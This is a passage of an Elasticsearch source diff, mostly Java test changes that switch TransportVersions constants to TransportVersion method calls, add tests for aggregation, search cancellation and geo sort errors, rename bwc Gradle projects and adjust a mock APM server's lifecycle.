RecoverySource.EmptyStoreRecoverySource.INSTANCE + ), + indexService.getIndexSettings().getSettings() + ); + assertEquals(1, service.getActiveContexts()); + + boolean primary = randomBoolean(); + service.beforeIndexShardCreated( + TestShardRouting.newShardRouting( + new ShardId(indexService.index(), 0), + randomAlphaOfLength(5), + primary, + ShardRoutingState.INITIALIZING, + primary ? RecoverySource.ExistingStoreRecoverySource.INSTANCE : RecoverySource.PeerRecoverySource.INSTANCE ), indexService.getIndexSettings().getSettings() ); @@ -2911,7 +2925,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/test/java/org/elasticsearch/search/aggregations/AggregationBuilderTests.java b/server/src/test/java/org/elasticsearch/search/aggregations/AggregationBuilderTests.java index 8c5608fe1bea5..4f28e93f0706f 100644 --- a/server/src/test/java/org/elasticsearch/search/aggregations/AggregationBuilderTests.java +++ b/server/src/test/java/org/elasticsearch/search/aggregations/AggregationBuilderTests.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.TriConsumer; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.pipeline.AbstractPipelineAggregationBuilder; @@ -151,7 +150,7 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } @@ -184,7 +183,7 @@ protected void validate(ValidationContext context) {} @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } } diff --git a/server/src/test/java/org/elasticsearch/search/aggregations/AggregatorFactoriesTests.java b/server/src/test/java/org/elasticsearch/search/aggregations/AggregatorFactoriesTests.java index afe694a716341..8773418ece4fe 100644 --- a/server/src/test/java/org/elasticsearch/search/aggregations/AggregatorFactoriesTests.java +++ b/server/src/test/java/org/elasticsearch/search/aggregations/AggregatorFactoriesTests.java @@ -10,7 +10,6 @@ import org.apache.lucene.util.SetOnce; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Strings; @@ -389,7 +388,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/test/java/org/elasticsearch/search/aggregations/pipeline/BucketScriptAggregatorTests.java b/server/src/test/java/org/elasticsearch/search/aggregations/pipeline/BucketScriptAggregatorTests.java index ba6b9ddabdaf1..2d501226c2698 100644 --- a/server/src/test/java/org/elasticsearch/search/aggregations/pipeline/BucketScriptAggregatorTests.java +++ b/server/src/test/java/org/elasticsearch/search/aggregations/pipeline/BucketScriptAggregatorTests.java @@ -30,7 +30,9 @@ import org.elasticsearch.script.ScriptModule; import org.elasticsearch.script.ScriptService; import org.elasticsearch.script.ScriptType; +import org.elasticsearch.search.aggregations.AggregationBuilder; import org.elasticsearch.search.aggregations.AggregatorTestCase; +import org.elasticsearch.search.aggregations.bucket.filter.FilterAggregationBuilder; import org.elasticsearch.search.aggregations.bucket.filter.FiltersAggregationBuilder; import org.elasticsearch.search.aggregations.bucket.filter.InternalFilters; import org.elasticsearch.search.aggregations.bucket.terms.TermsAggregationBuilder; @@ -95,8 +97,42 @@ public void testScript() throws IOException { ); } + public void testNonMultiBucketParent() { + MappedFieldType fieldType = new NumberFieldMapper.NumberFieldType("number_field", NumberFieldMapper.NumberType.INTEGER); + MappedFieldType fieldType1 = new KeywordFieldMapper.KeywordFieldType("the_field"); + + FilterAggregationBuilder filter = new FilterAggregationBuilder("placeholder", new MatchAllQueryBuilder()).subAggregation( + new TermsAggregationBuilder("the_terms").userValueTypeHint(ValueType.STRING) + .field("the_field") + .subAggregation(new AvgAggregationBuilder("the_avg").field("number_field")) + ) + .subAggregation( + new BucketScriptPipelineAggregationBuilder( + "bucket_script", + Collections.singletonMap("the_avg", "the_terms['test1']>the_avg.value"), + new Script(ScriptType.INLINE, MockScriptEngine.NAME, SCRIPT_NAME, Collections.emptyMap()) + ) + ); + + assertThrows( + "Expected a multi bucket aggregation but got [InternalFilter] for aggregation [bucket_script]", + IllegalArgumentException.class, + () -> testCase(filter, new MatchAllDocsQuery(), iw -> { + Document doc = new Document(); + doc.add(new SortedSetDocValuesField("the_field", new BytesRef("test1"))); + doc.add(new SortedNumericDocValuesField("number_field", 19)); + iw.addDocument(doc); + + doc = new Document(); + doc.add(new SortedSetDocValuesField("the_field", new BytesRef("test2"))); + doc.add(new SortedNumericDocValuesField("number_field", 55)); + iw.addDocument(doc); + }, f -> fail("This shouldn't be called"), fieldType, fieldType1) + ); + } + private void testCase( - FiltersAggregationBuilder aggregationBuilder, + AggregationBuilder aggregationBuilder, Query query, CheckedConsumer buildIndex, Consumer verify, diff --git a/server/src/test/java/org/elasticsearch/search/internal/ContextIndexSearcherTests.java b/server/src/test/java/org/elasticsearch/search/internal/ContextIndexSearcherTests.java index fe07cbf8efdfd..ce521dcc48ba5 100644 --- a/server/src/test/java/org/elasticsearch/search/internal/ContextIndexSearcherTests.java +++ b/server/src/test/java/org/elasticsearch/search/internal/ContextIndexSearcherTests.java @@ -400,6 +400,29 @@ private static void assertSlices(LeafSlice[] slices, int numDocs, int numThreads assertThat(sumDocs, equalTo(numDocs)); } + public void testClearQueryCancellations() throws IOException { + Directory dir = newDirectory(); + RandomIndexWriter w = new RandomIndexWriter(random(), dir); + w.addDocument(new Document()); + DirectoryReader reader = w.getReader(); + ContextIndexSearcher searcher = new ContextIndexSearcher( + reader, + IndexSearcher.getDefaultSimilarity(), + IndexSearcher.getDefaultQueryCache(), + IndexSearcher.getDefaultQueryCachingPolicy(), + true + ); + + assertFalse(searcher.hasCancellations()); + searcher.addQueryCancellation(() -> {}); + assertTrue(searcher.hasCancellations()); + + searcher.clearQueryCancellations(); + assertFalse(searcher.hasCancellations()); + + IOUtils.close(reader, w, dir); + } + public void testExitableTermsMinAndMax() throws IOException { Directory dir = newDirectory(); IndexWriter w = new IndexWriter(dir, newIndexWriterConfig(null)); diff --git a/server/src/test/java/org/elasticsearch/search/query/SlowRunningQueryBuilder.java b/server/src/test/java/org/elasticsearch/search/query/SlowRunningQueryBuilder.java index 0c188256e0287..7fb6cd85579ed 100644 --- a/server/src/test/java/org/elasticsearch/search/query/SlowRunningQueryBuilder.java +++ b/server/src/test/java/org/elasticsearch/search/query/SlowRunningQueryBuilder.java @@ -15,7 +15,6 @@ import org.apache.lucene.search.ScoreMode; import org.apache.lucene.search.Weight; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.lucene.search.Queries; @@ -72,7 +71,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/test/java/org/elasticsearch/search/query/ThrowingQueryBuilder.java b/server/src/test/java/org/elasticsearch/search/query/ThrowingQueryBuilder.java index 8c21e95f48483..5ec16dce0b457 100644 --- a/server/src/test/java/org/elasticsearch/search/query/ThrowingQueryBuilder.java +++ b/server/src/test/java/org/elasticsearch/search/query/ThrowingQueryBuilder.java @@ -142,6 +142,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/test/java/org/elasticsearch/search/sort/GeoDistanceSortBuilderTests.java b/server/src/test/java/org/elasticsearch/search/sort/GeoDistanceSortBuilderTests.java index 17a9fb5974176..5bef1f4769cff 100644 --- a/server/src/test/java/org/elasticsearch/search/sort/GeoDistanceSortBuilderTests.java +++ b/server/src/test/java/org/elasticsearch/search/sort/GeoDistanceSortBuilderTests.java @@ -23,6 +23,7 @@ import org.elasticsearch.index.mapper.GeoPointFieldMapper; import org.elasticsearch.index.mapper.MappedFieldType; import org.elasticsearch.index.mapper.NestedPathFieldMapper; +import org.elasticsearch.index.mapper.NumberFieldMapper; import org.elasticsearch.index.query.GeoValidationMethod; import org.elasticsearch.index.query.MatchAllQueryBuilder; import org.elasticsearch.index.query.MatchNoneQueryBuilder; @@ -99,6 +100,9 @@ public static GeoDistanceSortBuilder randomGeoDistanceSortBuilder() { @Override protected MappedFieldType provideMappedFieldType(String name) { + if (name.equals("double")) { + return new NumberFieldMapper.NumberFieldType(name, NumberFieldMapper.NumberType.DOUBLE); + } return new GeoPointFieldMapper.GeoPointFieldType(name); } @@ -531,6 +535,12 @@ public void testBuildInvalidPoints() throws IOException { ); assertEquals("illegal longitude value [-360.0] for [GeoDistanceSort] for field [fieldName].", ex.getMessage()); } + { + GeoDistanceSortBuilder sortBuilder = new GeoDistanceSortBuilder("double", 0.0, 180.0); + sortBuilder.validation(GeoValidationMethod.STRICT); + IllegalArgumentException ex = expectThrows(IllegalArgumentException.class, () -> sortBuilder.build(searchExecutionContext)); + assertEquals("unable to apply geo distance sort to field [double] of type [double]", ex.getMessage()); + } } /** diff --git a/server/src/test/java/org/elasticsearch/search/suggest/SuggestTests.java b/server/src/test/java/org/elasticsearch/search/suggest/SuggestTests.java index f844f77d1dcef..c233dfc8e7de9 100644 --- a/server/src/test/java/org/elasticsearch/search/suggest/SuggestTests.java +++ b/server/src/test/java/org/elasticsearch/search/suggest/SuggestTests.java @@ -296,7 +296,7 @@ public void testMergingSuggestionOptions() { public void testSerialization() throws IOException { TransportVersion bwcVersion = TransportVersionUtils.randomVersionBetween( random(), - TransportVersions.MINIMUM_COMPATIBLE, + TransportVersion.minimumCompatible(), TransportVersion.current() ); diff --git a/server/src/test/java/org/elasticsearch/transport/InboundDecoderTests.java b/server/src/test/java/org/elasticsearch/transport/InboundDecoderTests.java index fc06487fdcd41..03a99a0e7bb37 100644 --- a/server/src/test/java/org/elasticsearch/transport/InboundDecoderTests.java +++ b/server/src/test/java/org/elasticsearch/transport/InboundDecoderTests.java @@ -10,7 +10,6 @@ package org.elasticsearch.transport; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.bytes.BytesReference; import org.elasticsearch.common.bytes.ReleasableBytesReference; import org.elasticsearch.common.io.stream.BytesStreamOutput; @@ -340,7 +339,7 @@ public void testCompressedDecode() throws IOException { public void testVersionIncompatibilityDecodeException() throws IOException { String action = "test-request"; long requestId = randomNonNegativeLong(); - TransportVersion incompatibleVersion = TransportVersionUtils.getPreviousVersion(TransportVersions.MINIMUM_COMPATIBLE); + TransportVersion incompatibleVersion = TransportVersionUtils.getPreviousVersion(TransportVersion.minimumCompatible()); final ReleasableBytesReference releasable1; try (RecyclerBytesStreamOutput os = new RecyclerBytesStreamOutput(recycler)) { final BytesReference bytes = OutboundHandler.serialize( @@ -369,13 +368,13 @@ public void testVersionIncompatibilityDecodeException() throws IOException { public void testCheckVersionCompatibility() { try { InboundDecoder.checkVersionCompatibility( - TransportVersionUtils.randomVersionBetween(random(), TransportVersions.MINIMUM_COMPATIBLE, TransportVersion.current()) + TransportVersionUtils.randomVersionBetween(random(), TransportVersion.minimumCompatible(), TransportVersion.current()) ); } catch (IllegalStateException e) { throw new AssertionError(e); } - TransportVersion invalid = TransportVersionUtils.getPreviousVersion(TransportVersions.MINIMUM_COMPATIBLE); + TransportVersion invalid = TransportVersionUtils.getPreviousVersion(TransportVersion.minimumCompatible()); try { InboundDecoder.checkVersionCompatibility(invalid); fail(); @@ -384,7 +383,7 @@ public void testCheckVersionCompatibility() { "Received message from unsupported version: [" + invalid.toReleaseVersion() + "] minimal compatible version is: [" - + TransportVersions.MINIMUM_COMPATIBLE.toReleaseVersion() + + TransportVersion.minimumCompatible().toReleaseVersion() + "]", expected.getMessage() ); diff --git a/server/src/test/java/org/elasticsearch/transport/InboundHandlerTests.java b/server/src/test/java/org/elasticsearch/transport/InboundHandlerTests.java index c4e85e1d35d72..dfc97e26e67b6 100644 --- a/server/src/test/java/org/elasticsearch/transport/InboundHandlerTests.java +++ b/server/src/test/java/org/elasticsearch/transport/InboundHandlerTests.java @@ -12,7 +12,6 @@ import org.apache.logging.log4j.Level; import org.elasticsearch.ElasticsearchException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.support.PlainActionFuture; import org.elasticsearch.common.bytes.BytesArray; @@ -31,7 +30,6 @@ import org.elasticsearch.core.Tuple; import org.elasticsearch.tasks.TaskId; import org.elasticsearch.tasks.TaskManager; -import org.elasticsearch.telemetry.tracing.Tracer; import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.MockLog; import org.elasticsearch.test.TransportVersionUtils; @@ -114,8 +112,7 @@ public void testPing() throws Exception { (request, channel, task) -> channelCaptor.set(channel), EsExecutors.DIRECT_EXECUTOR_SERVICE, false, - true, - Tracer.NOOP + true ); requestHandlers.registerHandler(registry); @@ -166,8 +163,7 @@ public TestResponse read(StreamInput in) throws IOException { }, EsExecutors.DIRECT_EXECUTOR_SERVICE, false, - true, - Tracer.NOOP + true ); requestHandlers.registerHandler(registry); String requestValue = randomAlphaOfLength(10); @@ -245,7 +241,7 @@ public void testClosesChannelOnErrorInHandshake() throws Exception { final TransportVersion remoteVersion = TransportVersionUtils.randomVersionBetween( random(), TransportVersionUtils.getFirstVersion(), - TransportVersionUtils.getPreviousVersion(TransportVersions.MINIMUM_COMPATIBLE) + TransportVersionUtils.getPreviousVersion(TransportVersion.minimumCompatible()) ); final long requestId = randomNonNegativeLong(); final Header requestHeader = new Header( diff --git a/server/src/test/java/org/elasticsearch/transport/InboundPipelineTests.java b/server/src/test/java/org/elasticsearch/transport/InboundPipelineTests.java index 78fbd7359fa2c..3759663d8cae7 100644 --- a/server/src/test/java/org/elasticsearch/transport/InboundPipelineTests.java +++ b/server/src/test/java/org/elasticsearch/transport/InboundPipelineTests.java @@ -10,7 +10,6 @@ package org.elasticsearch.transport; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.breaker.CircuitBreaker; import org.elasticsearch.common.breaker.CircuitBreakingException; import org.elasticsearch.common.breaker.NoopCircuitBreaker; @@ -99,7 +98,7 @@ public void testPipelineHandling() throws IOException { toRelease.clear(); try (RecyclerBytesStreamOutput streamOutput = new RecyclerBytesStreamOutput(recycler)) { while (streamOutput.size() < BYTE_THRESHOLD) { - final TransportVersion version = randomFrom(TransportVersion.current(), TransportVersions.MINIMUM_COMPATIBLE); + final TransportVersion version = randomFrom(TransportVersion.current(), TransportVersion.minimumCompatible()); final String value = randomRealisticUnicodeOfCodepointLength(randomIntBetween(200, 400)); final boolean isRequest = randomBoolean(); Compression.Scheme compressionScheme = getCompressionScheme(); @@ -214,7 +213,7 @@ public void testDecodeExceptionIsPropagated() throws IOException { try (RecyclerBytesStreamOutput streamOutput = new RecyclerBytesStreamOutput(recycler)) { String actionName = "actionName"; - final TransportVersion invalidVersion = TransportVersionUtils.getPreviousVersion(TransportVersions.MINIMUM_COMPATIBLE); + final TransportVersion invalidVersion = TransportVersionUtils.getPreviousVersion(TransportVersion.minimumCompatible()); final String value = randomAlphaOfLength(1000); final boolean isRequest = randomBoolean(); final long requestId = randomNonNegativeLong(); diff --git a/server/src/test/java/org/elasticsearch/transport/ProxyConnectionStrategyTests.java b/server/src/test/java/org/elasticsearch/transport/ProxyConnectionStrategyTests.java index f9a9baf09898b..ffa1cfa6f2d33 100644 --- a/server/src/test/java/org/elasticsearch/transport/ProxyConnectionStrategyTests.java +++ b/server/src/test/java/org/elasticsearch/transport/ProxyConnectionStrategyTests.java @@ -11,7 +11,6 @@ import org.elasticsearch.ElasticsearchException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.Version; import org.elasticsearch.action.support.PlainActionFuture; import org.elasticsearch.cluster.ClusterName; @@ -250,7 +249,7 @@ public void testConnectFailsWithIncompatibleNodes() { IndexVersions.MINIMUM_COMPATIBLE, IndexVersion.current() ); - TransportVersion incompatibleTransportVersion = TransportVersionUtils.getPreviousVersion(TransportVersions.MINIMUM_COMPATIBLE); + TransportVersion incompatibleTransportVersion = TransportVersionUtils.getPreviousVersion(TransportVersion.minimumCompatible()); try (MockTransportService transport1 = startTransport("incompatible-node", incompatibleVersion, incompatibleTransportVersion)) { TransportAddress address1 = transport1.boundAddress().publishAddress(); diff --git a/server/src/test/java/org/elasticsearch/transport/SniffConnectionStrategyTests.java b/server/src/test/java/org/elasticsearch/transport/SniffConnectionStrategyTests.java index e41d035aa1046..90ef3e80d5b47 100644 --- a/server/src/test/java/org/elasticsearch/transport/SniffConnectionStrategyTests.java +++ b/server/src/test/java/org/elasticsearch/transport/SniffConnectionStrategyTests.java @@ -10,7 +10,6 @@ package org.elasticsearch.transport; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.Version; import org.elasticsearch.action.admin.cluster.remote.RemoteClusterNodesAction; import org.elasticsearch.action.admin.cluster.state.ClusterStateAction; @@ -393,7 +392,7 @@ public void testDiscoverWithSingleIncompatibleSeedNode() { IndexVersions.MINIMUM_COMPATIBLE, IndexVersion.current() ); - TransportVersion incompatibleTransportVersion = TransportVersionUtils.getPreviousVersion(TransportVersions.MINIMUM_COMPATIBLE); + TransportVersion incompatibleTransportVersion = TransportVersionUtils.getPreviousVersion(TransportVersion.minimumCompatible()); try ( MockTransportService seedTransport = startTransport( "seed_node", @@ -476,7 +475,7 @@ public void testConnectFailsWithIncompatibleNodes() { IndexVersions.MINIMUM_COMPATIBLE, IndexVersion.current() ); - TransportVersion incompatibleTransportVersion = TransportVersionUtils.getPreviousVersion(TransportVersions.MINIMUM_COMPATIBLE); + TransportVersion incompatibleTransportVersion = TransportVersionUtils.getPreviousVersion(TransportVersion.minimumCompatible()); try ( MockTransportService incompatibleSeedTransport = startTransport( "seed_node", diff --git a/server/src/test/java/org/elasticsearch/transport/TransportActionProxyTests.java b/server/src/test/java/org/elasticsearch/transport/TransportActionProxyTests.java index f64b012165478..e1a525cab3f52 100644 --- a/server/src/test/java/org/elasticsearch/transport/TransportActionProxyTests.java +++ b/server/src/test/java/org/elasticsearch/transport/TransportActionProxyTests.java @@ -11,7 +11,6 @@ import org.elasticsearch.ElasticsearchException; import org.elasticsearch.ExceptionsHelper; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.Version; import org.elasticsearch.cluster.node.DiscoveryNode; import org.elasticsearch.cluster.node.VersionInformation; @@ -58,7 +57,7 @@ public class TransportActionProxyTests extends ESTestCase { IndexVersions.MINIMUM_COMPATIBLE, IndexVersion.current() ); - protected static final TransportVersion transportVersion0 = TransportVersions.MINIMUM_COMPATIBLE; + protected static final TransportVersion transportVersion0 = TransportVersion.minimumCompatible(); protected DiscoveryNode nodeA; protected MockTransportService serviceA; diff --git a/server/src/test/java/org/elasticsearch/transport/TransportHandshakerTests.java b/server/src/test/java/org/elasticsearch/transport/TransportHandshakerTests.java index fbbf2e92c89cd..7c08b8ab84204 100644 --- a/server/src/test/java/org/elasticsearch/transport/TransportHandshakerTests.java +++ b/server/src/test/java/org/elasticsearch/transport/TransportHandshakerTests.java @@ -11,7 +11,6 @@ import org.apache.logging.log4j.Level; import org.elasticsearch.Build; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.support.PlainActionFuture; import org.elasticsearch.cluster.node.DiscoveryNode; @@ -113,7 +112,7 @@ public void testIncompatibleHandshakeRequest() throws Exception { StreamInput input = bytesStreamOutput.bytes().streamInput(); input.setTransportVersion(HANDSHAKE_REQUEST_VERSION); - if (handshakeRequest.transportVersion.onOrAfter(TransportVersions.MINIMUM_COMPATIBLE)) { + if (handshakeRequest.transportVersion.onOrAfter(TransportVersion.minimumCompatible())) { final PlainActionFuture responseFuture = new PlainActionFuture<>(); final TestTransportChannel channel = new TestTransportChannel(responseFuture); @@ -204,7 +203,7 @@ public void testHandshakeResponseFromOlderNodeWithPatchedProtocol() throws Excep final var randomIncompatibleTransportVersion = getRandomIncompatibleTransportVersion(); final var handshakeResponse = new TransportHandshaker.HandshakeResponse(randomIncompatibleTransportVersion, randomIdentifier()); - if (randomIncompatibleTransportVersion.onOrAfter(TransportVersions.MINIMUM_COMPATIBLE)) { + if (randomIncompatibleTransportVersion.onOrAfter(TransportVersion.minimumCompatible())) { // we fall back to the best known version MockLog.assertThatLogger( () -> handler.handleResponse(handshakeResponse), @@ -258,11 +257,11 @@ public void testHandshakeResponseFromOlderNodeWithPatchedProtocol() throws Excep private static TransportVersion getRandomIncompatibleTransportVersion() { return randomBoolean() // either older than MINIMUM_COMPATIBLE - ? new TransportVersion(between(1, TransportVersions.MINIMUM_COMPATIBLE.id() - 1)) + ? new TransportVersion(between(1, TransportVersion.minimumCompatible().id() - 1)) // or between MINIMUM_COMPATIBLE and current but not known : randomValueOtherThanMany( TransportVersion::isKnown, - () -> new TransportVersion(between(TransportVersions.MINIMUM_COMPATIBLE.id(), TransportVersion.current().id())) + () -> new TransportVersion(between(TransportVersion.minimumCompatible().id(), TransportVersion.current().id())) ); } diff --git a/server/src/test/java/org/elasticsearch/transport/TransportServiceHandshakeTests.java b/server/src/test/java/org/elasticsearch/transport/TransportServiceHandshakeTests.java index d92e291712388..01c33219a632d 100644 --- a/server/src/test/java/org/elasticsearch/transport/TransportServiceHandshakeTests.java +++ b/server/src/test/java/org/elasticsearch/transport/TransportServiceHandshakeTests.java @@ -12,7 +12,6 @@ import org.apache.logging.log4j.Level; import org.elasticsearch.Build; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.Version; import org.elasticsearch.cluster.node.DiscoveryNode; import org.elasticsearch.cluster.node.DiscoveryNodeUtils; @@ -211,7 +210,7 @@ public void testIncompatibleNodeVersions() { TransportService transportServiceB = startServices( "TS_B", settings, - TransportVersions.MINIMUM_COMPATIBLE, + TransportVersion.minimumCompatible(), new VersionInformation( VersionUtils.getPreviousVersion(Version.CURRENT.minimumCompatibilityVersion()), IndexVersions.MINIMUM_COMPATIBLE, @@ -263,7 +262,7 @@ public void testIncompatibleTransportVersions() { TransportService transportServiceB = startServices( "TS_B", settings, - TransportVersionUtils.getPreviousVersion(TransportVersions.MINIMUM_COMPATIBLE), + TransportVersionUtils.getPreviousVersion(TransportVersion.minimumCompatible()), new VersionInformation(Version.CURRENT.minimumCompatibilityVersion(), IndexVersions.MINIMUM_COMPATIBLE, IndexVersion.current()), TransportService.NOOP_TRANSPORT_INTERCEPTOR ); @@ -418,7 +417,7 @@ public void testAcceptsMismatchedBuildHashFromDifferentVersion() { final TransportService transportServiceB = startServices( "TS_B", Settings.builder().put("cluster.name", "a").build(), - TransportVersions.MINIMUM_COMPATIBLE, + TransportVersion.minimumCompatible(), new VersionInformation(Version.CURRENT.minimumCompatibilityVersion(), IndexVersions.MINIMUM_COMPATIBLE, IndexVersion.current()), transportInterceptorB ); diff --git a/settings.gradle b/settings.gradle index f3463efc5af38..ee67bffe7a99c 100644 --- a/settings.gradle +++ b/settings.gradle @@ -1,6 +1,7 @@ import org.elasticsearch.gradle.internal.toolchain.OracleOpenJdkToolchainResolver import org.elasticsearch.gradle.internal.toolchain.ArchivedOracleJdkToolchainResolver import org.elasticsearch.gradle.internal.toolchain.AdoptiumJdkToolchainResolver +import org.elasticsearch.gradle.internal.toolchain.EarlyAccessCatalogJdkToolchainResolver pluginManagement { repositories { @@ -76,13 +77,14 @@ List projects = [ 'distribution:packages:deb', 'distribution:packages:aarch64-rpm', 'distribution:packages:rpm', - 'distribution:bwc:bugfix', - 'distribution:bwc:bugfix2', - 'distribution:bwc:bugfix3', - 'distribution:bwc:maintenance', - 'distribution:bwc:minor', - 'distribution:bwc:staged', - 'distribution:bwc:staged2', + 'distribution:bwc:major1', + 'distribution:bwc:major2', + 'distribution:bwc:major3', + 'distribution:bwc:major4', + 'distribution:bwc:minor1', + 'distribution:bwc:minor2', + 'distribution:bwc:minor3', + 'distribution:bwc:minor4', 'distribution:bwc:main', 'distribution:tools:java-version-checker', 'distribution:tools:cli-launcher', diff --git a/test/external-modules/apm-integration/src/javaRestTest/java/org/elasticsearch/test/apmintegration/RecordingApmServer.java b/test/external-modules/apm-integration/src/javaRestTest/java/org/elasticsearch/test/apmintegration/RecordingApmServer.java index db2ce9fb83a55..d20f2d08719e7 100644 --- a/test/external-modules/apm-integration/src/javaRestTest/java/org/elasticsearch/test/apmintegration/RecordingApmServer.java +++ b/test/external-modules/apm-integration/src/javaRestTest/java/org/elasticsearch/test/apmintegration/RecordingApmServer.java @@ -15,7 +15,6 @@ import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import org.elasticsearch.core.SuppressForbidden; -import org.elasticsearch.xcontent.spi.XContentProvider; import org.junit.rules.ExternalResource; import java.io.BufferedReader; @@ -25,7 +24,6 @@ import java.net.InetAddress; import java.net.InetSocketAddress; import java.nio.charset.StandardCharsets; -import java.util.ArrayList; import java.util.List; import java.util.concurrent.ArrayBlockingQueue; import java.util.concurrent.TimeUnit; @@ -35,14 +33,12 @@ public class RecordingApmServer extends ExternalResource { private static final Logger logger = LogManager.getLogger(RecordingApmServer.class); - private static final XContentProvider.FormatProvider XCONTENT = XContentProvider.provider().getJsonXContent(); - final ArrayBlockingQueue received = new ArrayBlockingQueue<>(1000); private static HttpServer server; private final Thread messageConsumerThread = consumerThread(); private volatile Consumer consumer; - private volatile boolean consumerRunning = true; + private volatile boolean running = true; @Override protected void before() throws Throwable { @@ -56,7 +52,7 @@ protected void before() throws Throwable { private Thread consumerThread() { return new Thread(() -> { - while (consumerRunning) { + while (running) { if (consumer != null) { try { String msg = received.poll(1L, TimeUnit.SECONDS); @@ -74,28 +70,38 @@ private Thread consumerThread() { @Override protected void after() { + running = false; server.stop(1); - consumerRunning = false; + consumer = null; } private void handle(HttpExchange exchange) throws IOException { try (exchange) { - try { - try (InputStream requestBody = exchange.getRequestBody()) { - if (requestBody != null) { - var read = readJsonMessages(requestBody); - received.addAll(read); + if (running) { + try { + try (InputStream requestBody = exchange.getRequestBody()) { + if (requestBody != null) { + var read = readJsonMessages(requestBody); + received.addAll(read); + } } - } - } catch (RuntimeException e) { - logger.warn("failed to parse request", e); + } catch (Throwable t) { + // The lifetime of HttpServer makes message handling "brittle": we need to start handling and recording received + // messages before the test starts running. We should also stop handling them before the test ends (and the test + // cluster is torn down), or we may run into IOException as the communication channel is interrupted. + // Coordinating the lifecycle of the mock HttpServer and of the test ES cluster is difficult and error-prone, so + // we just handle Throwable and don't care (log, but don't care): if we have an error in communicating to/from + // the mock server while the test is running, the test would fail anyway as the expected messages will not arrive, and + // if we have an error outside the test scope (before or after) that is OK. + logger.warn("failed to parse request", t); + } } exchange.sendResponseHeaders(201, 0); } } - private List readJsonMessages(InputStream input) throws IOException { + private List readJsonMessages(InputStream input) { // parse NDJSON return new BufferedReader(new InputStreamReader(input, StandardCharsets.UTF_8)).lines().toList(); } @@ -104,14 +110,7 @@ public int getPort() { return server.getAddress().getPort(); } - public List getMessages() { - List list = new ArrayList<>(received.size()); - received.drainTo(list); - return list; - } - public void addMessageConsumer(Consumer messageConsumer) { this.consumer = messageConsumer; } - } diff --git a/test/external-modules/apm-integration/src/javaRestTest/java/org/elasticsearch/test/apmintegration/TracesApmIT.java b/test/external-modules/apm-integration/src/javaRestTest/java/org/elasticsearch/test/apmintegration/TracesApmIT.java index 6b10140bd80ed..afb9243e0f3ef 100644 --- a/test/external-modules/apm-integration/src/javaRestTest/java/org/elasticsearch/test/apmintegration/TracesApmIT.java +++ b/test/external-modules/apm-integration/src/javaRestTest/java/org/elasticsearch/test/apmintegration/TracesApmIT.java @@ -91,7 +91,8 @@ public void testApmIntegration() throws Exception { client().performRequest(nodeStatsRequest); - finished.await(30, TimeUnit.SECONDS); + var completed = finished.await(30, TimeUnit.SECONDS); + assertTrue("Timeout when waiting for assertions to complete", completed); assertThat(assertions, equalTo(Collections.emptySet())); } @@ -143,5 +144,4 @@ private Map parseMap(String message) { return Collections.emptyMap(); } } - } diff --git a/test/external-modules/apm-integration/src/main/java/org/elasticsearch/test/apmintegration/TestMeterUsages.java b/test/external-modules/apm-integration/src/main/java/org/elasticsearch/test/apmintegration/TestMeterUsages.java index a0ae21b07379a..4b1f731510e01 100644 --- a/test/external-modules/apm-integration/src/main/java/org/elasticsearch/test/apmintegration/TestMeterUsages.java +++ b/test/external-modules/apm-integration/src/main/java/org/elasticsearch/test/apmintegration/TestMeterUsages.java @@ -39,22 +39,22 @@ public TestMeterUsages(MeterRegistry meterRegistry) { this.longHistogram = meterRegistry.registerLongHistogram("es.test.long_histogram.histogram", "test", "unit"); meterRegistry.registerDoubleGauge("es.test.double_gauge.current", "test", "unit", () -> { var value = doubleWithAttributes.get(); - logger.info("[es.test.double_gauge.current] callback with value [{}]", value); + logger.trace("[es.test.double_gauge.current] callback with value [{}]", value); return value; }); meterRegistry.registerLongGauge("es.test.long_gauge.current", "test", "unit", () -> { var value = longWithAttributes.get(); - logger.info("[es.test.long_gauge.current] callback with value [{}]", value); + logger.trace("[es.test.long_gauge.current] callback with value [{}]", value); return value; }); meterRegistry.registerLongAsyncCounter("es.test.async_long_counter.total", "test", "unit", () -> { var value = longWithAttributes.get(); - logger.info("[es.test.async_long_counter.total] callback with value [{}]", value); + logger.trace("[es.test.async_long_counter.total] callback with value [{}]", value); return value; }); meterRegistry.registerDoubleAsyncCounter("es.test.async_double_counter.total", "test", "unit", () -> { var value = doubleWithAttributes.get(); - 